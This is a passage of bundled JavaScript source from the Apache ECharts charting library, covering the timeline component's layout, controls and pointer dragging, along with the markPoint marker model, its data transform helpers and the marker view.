controlModel.get('itemSize') : 0;\n        var controlGap = showControl ? controlModel.get('itemGap') : 0;\n        var sizePlusGap = controlSize + controlGap;\n\n        // Special label rotate.\n        var labelRotation = timelineModel.get('label.rotate') || 0;\n        labelRotation = labelRotation * PI$5 / 180; // To radian.\n\n        var playPosition;\n        var prevBtnPosition;\n        var nextBtnPosition;\n        var axisExtent;\n        var controlPosition = controlModel.get('position', true);\n        var showPlayBtn = showControl && controlModel.get('showPlayBtn', true);\n        var showPrevBtn = showControl && controlModel.get('showPrevBtn', true);\n        var showNextBtn = showControl && controlModel.get('showNextBtn', true);\n        var xLeft = 0;\n        var xRight = mainLength;\n\n        // position[0] means left, position[1] means middle.\n        if (controlPosition === 'left' || controlPosition === 'bottom') {\n            showPlayBtn && (playPosition = [0, 0], xLeft += sizePlusGap);\n            showPrevBtn && (prevBtnPosition = [xLeft, 0], xLeft += sizePlusGap);\n            showNextBtn && (nextBtnPosition = [xRight - controlSize, 0], xRight -= sizePlusGap);\n        }\n        else { // 'top' 'right'\n            showPlayBtn && (playPosition = [xRight - controlSize, 0], xRight -= sizePlusGap);\n            showPrevBtn && (prevBtnPosition = [0, 0], xLeft += sizePlusGap);\n            showNextBtn && (nextBtnPosition = [xRight - controlSize, 0], xRight -= sizePlusGap);\n        }\n        axisExtent = [xLeft, xRight];\n\n        if (timelineModel.get('inverse')) {\n            axisExtent.reverse();\n        }\n\n        return {\n            viewRect: viewRect,\n            mainLength: mainLength,\n            orient: orient,\n\n            rotation: rotationMap[orient],\n            labelRotation: labelRotation,\n            labelPosOpt: labelPosOpt,\n            labelAlign: timelineModel.get('label.align') || labelAlignMap[orient],\n            labelBaseline: timelineModel.get('label.verticalAlign')\n                || timelineModel.get('label.baseline')\n                || labelBaselineMap[orient],\n\n            // Based on mainGroup.\n            playPosition: playPosition,\n            prevBtnPosition: prevBtnPosition,\n            nextBtnPosition: nextBtnPosition,\n            axisExtent: axisExtent,\n\n            controlSize: controlSize,\n            controlGap: controlGap\n        };\n    },\n\n    _position: function (layoutInfo, timelineModel) {\n        // Position is be called finally, because bounding rect is needed for\n        // adapt content to fill viewRect (auto adapt offset).\n\n        // Timeline may be not all in the viewRect when 'offset' is specified\n        // as a number, because it is more appropriate that label aligns at\n        // 'offset' but not the other edge defined by viewRect.\n\n        var mainGroup = this._mainGroup;\n        var labelGroup = this._labelGroup;\n\n        var viewRect = layoutInfo.viewRect;\n        if (layoutInfo.orient === 'vertical') {\n            // transform to horizontal, inverse rotate by left-top point.\n            var m = create$1();\n            var rotateOriginX = viewRect.x;\n            var rotateOriginY = viewRect.y + viewRect.height;\n            translate(m, m, [-rotateOriginX, -rotateOriginY]);\n            rotate(m, m, -PI$5 / 2);\n            translate(m, m, [rotateOriginX, rotateOriginY]);\n            viewRect = viewRect.clone();\n            viewRect.applyTransform(m);\n        }\n\n        var viewBound = getBound(viewRect);\n        var mainBound = getBound(mainGroup.getBoundingRect());\n        var labelBound = getBound(labelGroup.getBoundingRect());\n\n        var mainPosition = mainGroup.position;\n        var labelsPosition = labelGroup.position;\n\n        labelsPosition[0] = mainPosition[0] = viewBound[0][0];\n\n        var labelPosOpt = layoutInfo.labelPosOpt;\n\n        if (isNaN(labelPosOpt)) { // '+' or '-'\n            var mainBoundIdx = labelPosOpt === '+' ? 0 : 1;\n            toBound(mainPosition, mainBound, viewBound, 1, mainBoundIdx);\n            toBound(labelsPosition, labelBound, viewBound, 1, 1 - mainBoundIdx);\n        }\n        else {\n            var mainBoundIdx = labelPosOpt >= 0 ? 0 : 1;\n            toBound(mainPosition, mainBound, viewBound, 1, mainBoundIdx);\n            labelsPosition[1] = mainPosition[1] + labelPosOpt;\n        }\n\n        mainGroup.attr('position', mainPosition);\n        labelGroup.attr('position', labelsPosition);\n        mainGroup.rotation = labelGroup.rotation = layoutInfo.rotation;\n\n        setOrigin(mainGroup);\n        setOrigin(labelGroup);\n\n        function setOrigin(targetGroup) {\n            var pos = targetGroup.position;\n            targetGroup.origin = [\n                viewBound[0][0] - pos[0],\n                viewBound[1][0] - pos[1]\n            ];\n        }\n\n        function getBound(rect) {\n            // [[xmin, xmax], [ymin, ymax]]\n            return [\n                [rect.x, rect.x + rect.width],\n                [rect.y, rect.y + rect.height]\n            ];\n        }\n\n        function toBound(fromPos, from, to, dimIdx, boundIdx) {\n            fromPos[dimIdx] += to[dimIdx][boundIdx] - from[dimIdx][boundIdx];\n        }\n    },\n\n    _createAxis: function (layoutInfo, timelineModel) {\n        var data = timelineModel.getData();\n        var axisType = timelineModel.get('axisType');\n\n        var scale = createScaleByModel(timelineModel, axisType);\n\n        // Customize scale. The `tickValue` is `dataIndex`.\n        scale.getTicks = function () {\n            return data.mapArray(['value'], function (value) {\n                return value;\n            });\n        };\n\n        var dataExtent = data.getDataExtent('value');\n        scale.setExtent(dataExtent[0], dataExtent[1]);\n        scale.niceTicks();\n\n        var axis = new TimelineAxis('value', scale, layoutInfo.axisExtent, axisType);\n        axis.model = timelineModel;\n\n        return axis;\n    },\n\n    _createGroup: function (name) {\n        var newGroup = this['_' + name] = new Group();\n        this.group.add(newGroup);\n        return newGroup;\n    },\n\n    _renderAxisLine: function (layoutInfo, group, axis, timelineModel) {\n        var axisExtent = axis.getExtent();\n\n        if (!timelineModel.get('lineStyle.show')) {\n            return;\n        }\n\n        group.add(new Line({\n            shape: {\n                x1: axisExtent[0], y1: 0,\n                x2: axisExtent[1], y2: 0\n            },\n            style: extend(\n                {lineCap: 'round'},\n                timelineModel.getModel('lineStyle').getLineStyle()\n            ),\n            silent: true,\n            z2: 1\n        }));\n    },\n\n    /**\n     * @private\n     */\n    _renderAxisTick: function (layoutInfo, group, axis, timelineModel) {\n        var data = timelineModel.getData();\n        // Show all ticks, despite ignoring strategy.\n        var ticks = axis.scale.getTicks();\n\n        // The value is dataIndex, see the costomized scale.\n        each$24(ticks, function (value) {\n            var tickCoord = axis.dataToCoord(value);\n            var itemModel = data.getItemModel(value);\n            var itemStyleModel = itemModel.getModel('itemStyle');\n            var hoverStyleModel = itemModel.getModel('emphasis.itemStyle');\n            var symbolOpt = {\n                position: [tickCoord, 0],\n                onclick: bind$4(this._changeTimeline, this, value)\n            };\n            var el = giveSymbol(itemModel, itemStyleModel, group, symbolOpt);\n            setHoverStyle(el, hoverStyleModel.getItemStyle());\n\n            if (itemModel.get('tooltip')) {\n                el.dataIndex = value;\n                el.dataModel = timelineModel;\n            }\n            else {\n                el.dataIndex = el.dataModel = null;\n            }\n\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _renderAxisLabel: function (layoutInfo, group, axis, timelineModel) {\n        var labelModel = axis.getLabelModel();\n\n        if (!labelModel.get('show')) {\n            return;\n        }\n\n        var data = timelineModel.getData();\n        var labels = axis.getViewLabels();\n\n        each$24(labels, function (labelItem) {\n            // The tickValue is dataIndex, see the costomized scale.\n            var dataIndex = labelItem.tickValue;\n\n            var itemModel = data.getItemModel(dataIndex);\n            var normalLabelModel = itemModel.getModel('label');\n            var hoverLabelModel = itemModel.getModel('emphasis.label');\n            var tickCoord = axis.dataToCoord(labelItem.tickValue);\n            var textEl = new Text({\n                position: [tickCoord, 0],\n                rotation: layoutInfo.labelRotation - layoutInfo.rotation,\n                onclick: bind$4(this._changeTimeline, this, dataIndex),\n                silent: false\n            });\n            setTextStyle(textEl.style, normalLabelModel, {\n                text: labelItem.formattedLabel,\n                textAlign: layoutInfo.labelAlign,\n                textVerticalAlign: layoutInfo.labelBaseline\n            });\n\n            group.add(textEl);\n            setHoverStyle(\n                textEl, setTextStyle({}, hoverLabelModel)\n            );\n\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _renderControl: function (layoutInfo, group, axis, timelineModel) {\n        var controlSize = layoutInfo.controlSize;\n        var rotation = layoutInfo.rotation;\n\n        var itemStyle = timelineModel.getModel('controlStyle').getItemStyle();\n        var hoverStyle = timelineModel.getModel('emphasis.controlStyle').getItemStyle();\n        var rect = [0, -controlSize / 2, controlSize, controlSize];\n        var playState = timelineModel.getPlayState();\n        var inverse = timelineModel.get('inverse', true);\n\n        makeBtn(\n            layoutInfo.nextBtnPosition,\n            'controlStyle.nextIcon',\n            bind$4(this._changeTimeline, this, inverse ? '-' : '+')\n        );\n        makeBtn(\n            layoutInfo.prevBtnPosition,\n            'controlStyle.prevIcon',\n            bind$4(this._changeTimeline, this, inverse ? '+' : '-')\n        );\n        makeBtn(\n            layoutInfo.playPosition,\n            'controlStyle.' + (playState ? 'stopIcon' : 'playIcon'),\n            bind$4(this._handlePlayClick, this, !playState),\n            true\n        );\n\n        function makeBtn(position, iconPath, onclick, willRotate) {\n            if (!position) {\n                return;\n            }\n            var opt = {\n                position: position,\n                origin: [controlSize / 2, 0],\n                rotation: willRotate ? -rotation : 0,\n                rectHover: true,\n                style: itemStyle,\n                onclick: onclick\n            };\n            var btn = makeIcon(timelineModel, iconPath, rect, opt);\n            group.add(btn);\n            setHoverStyle(btn, hoverStyle);\n        }\n    },\n\n    _renderCurrentPointer: function (layoutInfo, group, axis, timelineModel) {\n        var data = timelineModel.getData();\n        var currentIndex = timelineModel.getCurrentIndex();\n        var pointerModel = data.getItemModel(currentIndex).getModel('checkpointStyle');\n        var me = this;\n\n        var callback = {\n            onCreate: function (pointer) {\n                pointer.draggable = true;\n                pointer.drift = bind$4(me._handlePointerDrag, me);\n                pointer.ondragend = bind$4(me._handlePointerDragend, me);\n                pointerMoveTo(pointer, currentIndex, axis, timelineModel, true);\n            },\n            onUpdate: function (pointer) {\n                pointerMoveTo(pointer, currentIndex, axis, timelineModel);\n            }\n        };\n\n        // Reuse when exists, for animation and drag.\n        this._currentPointer = giveSymbol(\n            pointerModel, pointerModel, this._mainGroup, {}, this._currentPointer, callback\n        );\n    },\n\n    _handlePlayClick: function (nextState) {\n        this._clearTimer();\n        this.api.dispatchAction({\n            type: 'timelinePlayChange',\n            playState: nextState,\n            from: this.uid\n        });\n    },\n\n    _handlePointerDrag: function (dx, dy, e) {\n        this._clearTimer();\n        this._pointerChangeTimeline([e.offsetX, e.offsetY]);\n    },\n\n    _handlePointerDragend: function (e) {\n        this._pointerChangeTimeline([e.offsetX, e.offsetY], true);\n    },\n\n    _pointerChangeTimeline: function (mousePos, trigger) {\n        var toCoord = this._toAxisCoord(mousePos)[0];\n\n        var axis = this._axis;\n        var axisExtent = asc(axis.getExtent().slice());\n\n        toCoord > axisExtent[1] && (toCoord = axisExtent[1]);\n        toCoord < axisExtent[0] && (toCoord = axisExtent[0]);\n\n        this._currentPointer.position[0] = toCoord;\n        this._currentPointer.dirty();\n\n        var targetDataIndex = this._findNearestTick(toCoord);\n        var timelineModel = this.model;\n\n        if (trigger || (\n            targetDataIndex !== timelineModel.getCurrentIndex()\n            && timelineModel.get('realtime')\n        )) {\n            this._changeTimeline(targetDataIndex);\n        }\n    },\n\n    _doPlayStop: function () {\n        this._clearTimer();\n\n        if (this.model.getPlayState()) {\n            this._timer = setTimeout(\n                bind$4(handleFrame, this),\n                this.model.get('playInterval')\n            );\n        }\n\n        function handleFrame() {\n            // Do not cache\n            var timelineModel = this.model;\n            this._changeTimeline(\n                timelineModel.getCurrentIndex()\n                + (timelineModel.get('rewind', true) ? -1 : 1)\n            );\n        }\n    },\n\n    _toAxisCoord: function (vertex) {\n        var trans = this._mainGroup.getLocalTransform();\n        return applyTransform$1(vertex, trans, true);\n    },\n\n    _findNearestTick: function (axisCoord) {\n        var data = this.model.getData();\n        var dist = Infinity;\n        var targetDataIndex;\n        var axis = this._axis;\n\n        data.each(['value'], function (value, dataIndex) {\n            var coord = axis.dataToCoord(value);\n            var d = Math.abs(coord - axisCoord);\n            if (d < dist) {\n                dist = d;\n                targetDataIndex = dataIndex;\n            }\n        });\n\n        return targetDataIndex;\n    },\n\n    _clearTimer: function () {\n        if (this._timer) {\n            clearTimeout(this._timer);\n            this._timer = null;\n        }\n    },\n\n    _changeTimeline: function (nextIndex) {\n        var currentIndex = this.model.getCurrentIndex();\n\n        if (nextIndex === '+') {\n            nextIndex = currentIndex + 1;\n        }\n        else if (nextIndex === '-') {\n            nextIndex = currentIndex - 1;\n        }\n\n        this.api.dispatchAction({\n            type: 'timelineChange',\n            currentIndex: nextIndex,\n            from: this.uid\n        });\n    }\n\n});\n\nfunction getViewRect$5(model, api) {\n    return getLayoutRect(\n        model.getBoxLayoutParams(),\n        {\n            width: api.getWidth(),\n            height: api.getHeight()\n        },\n        model.get('padding')\n    );\n}\n\nfunction makeIcon(timelineModel, objPath, rect, opts) {\n    var icon = makePath(\n        timelineModel.get(objPath).replace(/^path:\\/\\//, ''),\n        clone(opts || {}),\n        new BoundingRect(rect[0], rect[1], rect[2], rect[3]),\n        'center'\n    );\n\n    return icon;\n}\n\n/**\n * Create symbol or update symbol\n * opt: basic position and event handlers\n */\nfunction giveSymbol(hostModel, itemStyleModel, group, opt, symbol, callback) {\n    var color = itemStyleModel.get('color');\n\n    if (!symbol) {\n        var symbolType = hostModel.get('symbol');\n        symbol = createSymbol(symbolType, -1, -1, 2, 2, color);\n        symbol.setStyle('strokeNoScale', true);\n        group.add(symbol);\n        callback && callback.onCreate(symbol);\n    }\n    else {\n        symbol.setColor(color);\n        group.add(symbol); // Group may be new, also need to add.\n        callback && callback.onUpdate(symbol);\n    }\n\n    // Style\n    var itemStyle = itemStyleModel.getItemStyle(['color', 'symbol', 'symbolSize']);\n    symbol.setStyle(itemStyle);\n\n    // Transform and events.\n    opt = merge({\n        rectHover: true,\n        z2: 100\n    }, opt, true);\n\n    var symbolSize = hostModel.get('symbolSize');\n    symbolSize = symbolSize instanceof Array\n        ? symbolSize.slice()\n        : [+symbolSize, +symbolSize];\n    symbolSize[0] /= 2;\n    symbolSize[1] /= 2;\n    opt.scale = symbolSize;\n\n    var symbolOffset = hostModel.get('symbolOffset');\n    if (symbolOffset) {\n        var pos = opt.position = opt.position || [0, 0];\n        pos[0] += parsePercent$1(symbolOffset[0], symbolSize[0]);\n        pos[1] += parsePercent$1(symbolOffset[1], symbolSize[1]);\n    }\n\n    var symbolRotate = hostModel.get('symbolRotate');\n    opt.rotation = (symbolRotate || 0) * Math.PI / 180 || 0;\n\n    symbol.attr(opt);\n\n    // FIXME\n    // (1) When symbol.style.strokeNoScale is true and updateTransform is not performed,\n    // getBoundingRect will return wrong result.\n    // (This is supposed to be resolved in zrender, but it is a little difficult to\n    // leverage performance and auto updateTransform)\n    // (2) All of ancesters of symbol do not scale, so we can just updateTransform symbol.\n    symbol.updateTransform();\n\n    return symbol;\n}\n\nfunction pointerMoveTo(pointer, dataIndex, axis, timelineModel, noAnimation) {\n    if (pointer.dragging) {\n        return;\n    }\n\n    var pointerModel = timelineModel.getModel('checkpointStyle');\n    var toCoord = axis.dataToCoord(timelineModel.getData().get(['value'], dataIndex));\n\n    if (noAnimation || !pointerModel.get('animation', true)) {\n        pointer.attr({position: [toCoord, 0]});\n    }\n    else {\n        pointer.stopAnimation(true);\n        pointer.animateTo(\n            {position: [toCoord, 0]},\n            pointerModel.get('animationDuration', true),\n            pointerModel.get('animationEasing', true)\n        );\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * DataZoom component entry\n */\n\nregisterPreprocessor(preprocessor$2);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar addCommas$1 = addCommas;\nvar encodeHTML$1 = encodeHTML;\n\nfunction fillLabel(opt) {\n    defaultEmphasis(opt, 'label', ['show']);\n}\nvar MarkerModel = extendComponentModel({\n\n    type: 'marker',\n\n    dependencies: ['series', 'grid', 'polar', 'geo'],\n\n    /**\n     * @overrite\n     */\n    init: function (option, parentModel, ecModel) {\n\n        if (__DEV__) {\n            if (this.type === 'marker') {\n                throw new Error('Marker component is abstract component. Use markLine, markPoint, markArea instead.');\n            }\n        }\n        this.mergeDefaultAndTheme(option, ecModel);\n        this._mergeOption(option, ecModel, false, true);\n    },\n\n    /**\n     * @return {boolean}\n     */\n    isAnimationEnabled: function () {\n        if (env$1.node) {\n            return false;\n        }\n\n        var hostSeries = this.__hostSeries;\n        return this.getShallow('animation') && hostSeries && hostSeries.isAnimationEnabled();\n    },\n\n    /**\n     * @overrite\n     */\n    mergeOption: function (newOpt, ecModel) {\n        this._mergeOption(newOpt, ecModel, false, false);\n    },\n\n    _mergeOption: function (newOpt, ecModel, createdBySelf, isInit) {\n        var MarkerModel = this.constructor;\n        var modelPropName = this.mainType + 'Model';\n        if (!createdBySelf) {\n            ecModel.eachSeries(function (seriesModel) {\n\n                var markerOpt = seriesModel.get(this.mainType, true);\n\n                var markerModel = seriesModel[modelPropName];\n                if (!markerOpt || !markerOpt.data) {\n                    seriesModel[modelPropName] = null;\n                    return;\n                }\n                if (!markerModel) {\n                    if (isInit) {\n                        // Default label emphasis `position` and `show`\n                        fillLabel(markerOpt);\n                    }\n                    each$1(markerOpt.data, function (item) {\n                        // FIXME Overwrite fillLabel method ?\n                        if (item instanceof Array) {\n                            fillLabel(item[0]);\n                            fillLabel(item[1]);\n                        }\n                        else {\n                            fillLabel(item);\n                        }\n                    });\n\n                    markerModel = new MarkerModel(\n                        markerOpt, this, ecModel\n                    );\n\n                    extend(markerModel, {\n                        mainType: this.mainType,\n                        // Use the same series index and name\n                        seriesIndex: seriesModel.seriesIndex,\n                        name: seriesModel.name,\n                        createdBySelf: true\n                    });\n\n                    markerModel.__hostSeries = seriesModel;\n                }\n                else {\n                    markerModel._mergeOption(markerOpt, ecModel, true);\n                }\n                seriesModel[modelPropName] = markerModel;\n            }, this);\n        }\n    },\n\n    formatTooltip: function (dataIndex) {\n        var data = this.getData();\n        var value = this.getRawValue(dataIndex);\n        var formattedValue = isArray(value)\n            ? map(value, addCommas$1).join(', ') : addCommas$1(value);\n        var name = data.getName(dataIndex);\n        var html = encodeHTML$1(this.name);\n        if (value != null || name) {\n            html += '<br />';\n        }\n        if (name) {\n            html += encodeHTML$1(name);\n            if (value != null) {\n                html += ' : ';\n            }\n        }\n        if (value != null) {\n            html += encodeHTML$1(formattedValue);\n        }\n        return html;\n    },\n\n    getData: function () {\n        return this._data;\n    },\n\n    setData: function (data) {\n        this._data = data;\n    }\n});\n\nmixin(MarkerModel, dataFormatMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nMarkerModel.extend({\n\n    type: 'markPoint',\n\n    defaultOption: {\n        zlevel: 0,\n        z: 5,\n        symbol: 'pin',\n        symbolSize: 50,\n        //symbolRotate: 0,\n        //symbolOffset: [0, 0]\n        tooltip: {\n            trigger: 'item'\n        },\n        label: {\n            show: true,\n            position: 'inside'\n        },\n        itemStyle: {\n            borderWidth: 2\n        },\n        emphasis: {\n            label: {\n                show: true\n            }\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar indexOf$2 = indexOf;\n\nfunction hasXOrY(item) {\n    return !(isNaN(parseFloat(item.x)) && isNaN(parseFloat(item.y)));\n}\n\nfunction hasXAndY(item) {\n    return !isNaN(parseFloat(item.x)) && !isNaN(parseFloat(item.y));\n}\n\n// Make it simple, do not visit all stacked value to count precision.\n// function getPrecision(data, valueAxisDim, dataIndex) {\n//     var precision = -1;\n//     var stackedDim = data.mapDimension(valueAxisDim);\n//     do {\n//         precision = Math.max(\n//             numberUtil.getPrecision(data.get(stackedDim, dataIndex)),\n//             precision\n//         );\n//         var stackedOnSeries = data.getCalculationInfo('stackedOnSeries');\n//         if (stackedOnSeries) {\n//             var byValue = data.get(data.getCalculationInfo('stackedByDimension'), dataIndex);\n//             data = stackedOnSeries.getData();\n//             dataIndex = data.indexOf(data.getCalculationInfo('stackedByDimension'), byValue);\n//             stackedDim = data.getCalculationInfo('stackedDimension');\n//         }\n//         else {\n//             data = null;\n//         }\n//     } while (data);\n\n//     return precision;\n// }\n\nfunction markerTypeCalculatorWithExtent(\n    mlType, data, otherDataDim, targetDataDim, otherCoordIndex, targetCoordIndex\n) {\n    var coordArr = [];\n\n    var stacked = isDimensionStacked(data, targetDataDim /*, otherDataDim*/);\n    var calcDataDim = stacked\n        ? data.getCalculationInfo('stackResultDimension')\n        : targetDataDim;\n\n    var value = numCalculate(data, calcDataDim, mlType);\n\n    var dataIndex = data.indicesOfNearest(calcDataDim, value)[0];\n    coordArr[otherCoordIndex] = data.get(otherDataDim, dataIndex);\n    coordArr[targetCoordIndex] = data.get(calcDataDim, dataIndex);\n    var coordArrValue = data.get(targetDataDim, dataIndex);\n    // Make it simple, do not visit all stacked value to count precision.\n    var precision = getPrecision(data.get(targetDataDim, dataIndex));\n    precision = Math.min(precision, 20);\n    if (precision >= 0) {\n        coordArr[targetCoordIndex] = +coordArr[targetCoordIndex].toFixed(precision);\n    }\n\n    return [coordArr, coordArrValue];\n}\n\nvar curry$5 = curry;\n// TODO Specified percent\nvar markerTypeCalculator = {\n    /**\n     * @method\n     * @param {module:echarts/data/List} data\n     * @param {string} baseAxisDim\n     * @param {string} valueAxisDim\n     */\n    min: curry$5(markerTypeCalculatorWithExtent, 'min'),\n    /**\n     * @method\n     * @param {module:echarts/data/List} data\n     * @param {string} baseAxisDim\n     * @param {string} valueAxisDim\n     */\n    max: curry$5(markerTypeCalculatorWithExtent, 'max'),\n\n    /**\n     * @method\n     * @param {module:echarts/data/List} data\n     * @param {string} baseAxisDim\n     * @param {string} valueAxisDim\n     */\n    average: curry$5(markerTypeCalculatorWithExtent, 'average')\n};\n\n/**\n * Transform markPoint data item to format used in List by do the following\n * 1. Calculate statistic like `max`, `min`, `average`\n * 2. Convert `item.xAxis`, `item.yAxis` to `item.coord` array\n * @param  {module:echarts/model/Series} seriesModel\n * @param  {module:echarts/coord/*} [coordSys]\n * @param  {Object} item\n * @return {Object}\n */\nfunction dataTransform(seriesModel, item) {\n    var data = seriesModel.getData();\n    var coordSys = seriesModel.coordinateSystem;\n\n    // 1. If not specify the position with pixel directly\n    // 2. If `coord` is not a data array. Which uses `xAxis`,\n    // `yAxis` to specify the coord on each dimension\n\n    // parseFloat first because item.x and item.y can be percent string like '20%'\n    if (item && !hasXAndY(item) && !isArray(item.coord) && coordSys) {\n        var dims = coordSys.dimensions;\n        var axisInfo = getAxisInfo$1(item, data, coordSys, seriesModel);\n\n        // Clone the option\n        // Transform the properties xAxis, yAxis, radiusAxis, angleAxis, geoCoord to value\n        item = clone(item);\n\n        if (item.type\n            && markerTypeCalculator[item.type]\n            && axisInfo.baseAxis && axisInfo.valueAxis\n        ) {\n            var otherCoordIndex = indexOf$2(dims, axisInfo.baseAxis.dim);\n            var targetCoordIndex = indexOf$2(dims, axisInfo.valueAxis.dim);\n\n            var coordInfo = markerTypeCalculator[item.type](\n                data, axisInfo.baseDataDim, axisInfo.valueDataDim,\n                otherCoordIndex, targetCoordIndex\n            );\n            item.coord = coordInfo[0];\n            // Force to use the value of calculated value.\n            // let item use the value without stack.\n            item.value = coordInfo[1];\n\n        }\n        else {\n            // FIXME Only has one of xAxis and yAxis.\n            var coord = [\n                item.xAxis != null ? item.xAxis : item.radiusAxis,\n                item.yAxis != null ? item.yAxis : item.angleAxis\n            ];\n            // Each coord support max, min, average\n            for (var i = 0; i < 2; i++) {\n                if (markerTypeCalculator[coord[i]]) {\n                    coord[i] = numCalculate(data, data.mapDimension(dims[i]), coord[i]);\n                }\n            }\n            item.coord = coord;\n        }\n    }\n    return item;\n}\n\nfunction getAxisInfo$1(item, data, coordSys, seriesModel) {\n    var ret = {};\n\n    if (item.valueIndex != null || item.valueDim != null) {\n        ret.valueDataDim = item.valueIndex != null\n            ? data.getDimension(item.valueIndex) : item.valueDim;\n        ret.valueAxis = coordSys.getAxis(dataDimToCoordDim(seriesModel, ret.valueDataDim));\n        ret.baseAxis = coordSys.getOtherAxis(ret.valueAxis);\n        ret.baseDataDim = data.mapDimension(ret.baseAxis.dim);\n    }\n    else {\n        ret.baseAxis = seriesModel.getBaseAxis();\n        ret.valueAxis = coordSys.getOtherAxis(ret.baseAxis);\n        ret.baseDataDim = data.mapDimension(ret.baseAxis.dim);\n        ret.valueDataDim = data.mapDimension(ret.valueAxis.dim);\n    }\n\n    return ret;\n}\n\nfunction dataDimToCoordDim(seriesModel, dataDim) {\n    var data = seriesModel.getData();\n    var dimensions = data.dimensions;\n    dataDim = data.getDimension(dataDim);\n    for (var i = 0; i < dimensions.length; i++) {\n        var dimItem = data.getDimensionInfo(dimensions[i]);\n        if (dimItem.name === dataDim) {\n            return dimItem.coordDim;\n        }\n    }\n}\n\n/**\n * Filter data which is out of coordinateSystem range\n * [dataFilter description]\n * @param  {module:echarts/coord/*} [coordSys]\n * @param  {Object} item\n * @return {boolean}\n */\nfunction dataFilter$1(coordSys, item) {\n    // Alwalys return true if there is no coordSys\n    return (coordSys && coordSys.containData && item.coord && !hasXOrY(item))\n        ? coordSys.containData(item.coord) : true;\n}\n\nfunction dimValueGetter(item, dimName, dataIndex, dimIndex) {\n    // x, y, radius, angle\n    if (dimIndex < 2) {\n        return item.coord && item.coord[dimIndex];\n    }\n    return item.value;\n}\n\nfunction numCalculate(data, valueDataDim, type) {\n    if (type === 'average') {\n        var sum = 0;\n        var count = 0;\n        data.each(valueDataDim, function (val, idx) {\n            if (!isNaN(val)) {\n                sum += val;\n                count++;\n            }\n        });\n        return sum / count;\n    }\n    else if (type === 'median') {\n        return data.getMedian(valueDataDim);\n    }\n    else {\n        // max & min\n        return data.getDataExtent(valueDataDim, true)[type === 'max' ? 1 : 0];\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar MarkerView = extendComponentView({\n\n    type: 'marker',\n\n    init: function () {\n        /**\n         * Markline grouped by series\n         * @private\n         * @type {module:zrender/core/util.HashMap}\n         */\n        this.markerGroupMap = createHashMap();\n    },\n\n    render: function (markerModel, ecModel, api) {\n        var markerGroupMap = this.markerGroupMap;\n        markerGroupMap.each(function (item) {\n            item.__keep = false;\n        });\n\n        var markerModelKey = this.type + 'Model';\n        ecModel.eachSeries(function (seriesModel) {\n            var markerModel = seriesModel[markerModelKey];\n            markerModel && this.renderSeries(seriesModel, markerModel, ecModel, api);\n        }, this);\n\n        markerGroupMap.each(function (item) {\n            !item.__keep && this.group.remove(item.group);\n        }, this);\n    },\n\n    renderSeries: function () {}\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction updateMarkerLayout(mpData, seriesModel, api) {\n    var coordSys = seriesModel.coordinateSystem;\n    mpData.each(function (idx) {\n        var itemModel = 